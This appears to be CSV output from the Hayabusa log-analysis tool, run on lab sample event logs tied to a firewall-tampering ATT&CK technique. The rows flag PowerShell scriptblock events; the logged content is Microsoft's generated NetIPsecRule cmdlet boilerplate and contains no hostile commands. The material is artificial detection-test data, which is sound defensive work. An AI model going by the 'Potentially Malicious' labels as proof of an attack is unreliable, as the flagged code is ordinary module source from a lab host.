($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, 
$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecRule' -Alias '*' function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', 
Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Parameter",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, 
[Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
